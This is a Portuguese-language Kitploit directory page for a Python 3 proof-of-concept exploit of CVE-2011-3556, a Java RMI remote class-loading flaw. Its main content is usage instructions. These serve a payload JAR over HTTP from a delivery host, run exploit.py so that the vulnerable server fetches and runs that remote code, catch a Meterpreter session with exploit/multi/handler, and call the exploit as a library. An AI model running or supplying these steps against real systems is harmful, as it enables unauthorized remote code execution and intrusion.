Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve_2011_3556 — Implementação em Python 3 de uma prova de conceito (PoC) existente para o CVE-2011-3556. | Kitploit
Ferramentas/GitHubGitHub/sk4la/cve_2011_3556
Frameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubsk4la/cve_2011_3556

cve_2011_3556

Implementação em Python 3 de uma prova de conceito (PoC) existente para o CVE-2011-3556.

Ver Repositório
1há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2011-3556 — Prova de Conceito (PoC)

Aviso Legal

Esta ferramenta é uma implementação em Python 3 de uma prova de conceito (PoC) existente, feita por mihi para o Metasploit Framework.

Pré-requisitos

Para usar o módulo, basta seguir as instruções abaixo:

root@kitploit:~
# Clone este repositório localmente.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Opcionalmente, defina o bit `x` para poder executar o script diretamente.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "Funcionou!"

Uso

Linha de comando

Para ser carregado remotamente pelo servidor Java RMI vulnerável, o payload (um binário JAR) deve ser servido como um recurso HTTP. Pode-se servi-lo rapidamente usando o famoso python3 -m http.server.

Assim que o payload estiver disponível para download, basta executar o script exploit.py para acionar a vulnerabilidade.

root@kitploit:~
$ python3 -m http.server --bind HOST_ENTREGA PORTA_ENTREGA &
$ ./exploit.py -h HOST_VULNERAVEL -u http://HOST_ENTREGA:PORTA_ENTREGA/PAYLOAD.jar`

Caso o payload seja um Meterpreter (Metasploit Framework), não se esqueça de use exploit/multi/handler.

Biblioteca

Este módulo também pode ser usado como uma biblioteca importando o módulo cve_2011_3556 para o seu namespace atual:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

É simples assim!

Créditos

Agradecimentos especiais a mihi pela implementação inicial do módulo do Metasploit Framework.

Baixar ferramenta